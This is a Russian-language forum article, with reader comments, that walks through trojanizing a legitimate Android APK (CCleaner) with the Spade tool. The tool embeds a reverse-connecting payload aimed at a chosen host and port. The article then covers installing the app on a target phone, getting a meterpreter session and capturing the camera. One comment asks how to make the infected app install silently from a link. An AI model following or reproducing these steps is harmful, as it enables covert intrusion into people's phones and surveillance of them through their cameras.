Статья Взлом Android-устройства

Привет! В этой публикации, я опишу действенный способ взлома телефона под управлением ОС Android. Он основывается на сшивании полезной нагрузки с APK файлом.

Для начала скачаем любую программу под Android ( я выбрал, для примера CCleaner) с сайта , попробуем, для начала, на ней.

Затем скачиваем для нашей Kali Linux софт под названием Spade. Для этого пишем в терминале следующее:
Код:
git clone https://github.com/suraj-root/spade.git
upload_2016-10-17_20-20-41.png

После успешного выполнения команды, вводим следующее:

> ./spade.py /root/Desktop/ccleaner.apk (тут мы указываем программе, с каким файлом она должна работать)

После запуска указанной команды вас встретит меню, в котором необходимо будет выбрать тип пайлоада (я выбирал 3), затем она попросит вас указать адрес хоста, на который полезная нагрузка будет «стучаться» в попытке установить соединение. Так же необходимо будет ввести порт.

> lhost > 192.168.0.103

> lport > 4444

upload_2016-10-17_20-21-32.png

upload_2016-10-17_20-21-40.png

Запускаем процесс, который внедрит нашу полезную нагрузку в файл APK.

upload_2016-10-17_20-22-6.png

Видим привилегии, которые нам доступны:

upload_2016-10-17_20-22-32.png

Готовый файл сохраняется в директории /root/spade

upload_2016-10-17_20-22-51.png

На запрос этой настройки отвечаем утвердительно:

upload_2016-10-17_20-23-18.png

Теперь необходимо передать созданный файл нашему целевому устройству. Копируем его на телефон, устанавливая его по стандартной схеме. После запуска приложения, если все сделано, верно, то видим открывшуюся сессию meterpreter:

upload_2016-10-17_20-23-36.png

Попробуем осмотреться в системе:

upload_2016-10-17_20-23-55.png

Все работает, теперь можно испытать работу, к примеру, камеры:
Код:
webcam_snap
upload_2016-10-17_20-24-23.png

И эта команда срабатывает успешно:

upload_2016-10-17_20-24-45.png

На этом все, спасибо за внимание.

Данная статья опубликована исключительно в ознакомительных целях и не является руководством к действиям.
Ссылка на оригинал -

Последнее редактирование:
А есть возможность использовать более 2-3 устройств?

Перечитал всю тему, ну разложите же скорей пожалуйста по полочкам, почему матьего не создаётся файл -final.apk, блин в терминате пишет что всё нормально

Не хочу ни кого оскорбить или обидеть... Темы конечно классные, но они не для новичков даже если написано "для новичков"
примитивно репост, нет энтузиазма несущих свет знаний прометеев
И видосы мертвые

Последнее редактирование:
Меня нужно хакер уменя йест тел модели bbd100-1 немогу открит

Не сможешь

Goog porol nevazmojno

Доброго времени суток, господа. Внедрять бэкдор в приложение это всё хорошо, но меня терзают смутные сомнения относительно того, что человек станет загружать и устанавливать это приложение. Можно ли сделать так, чтобы по переходу по ссылке приложение автоматически загрузилось и установилось тоже автоматически незаметно для пользователя? Буду признателен за подсказки.

Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!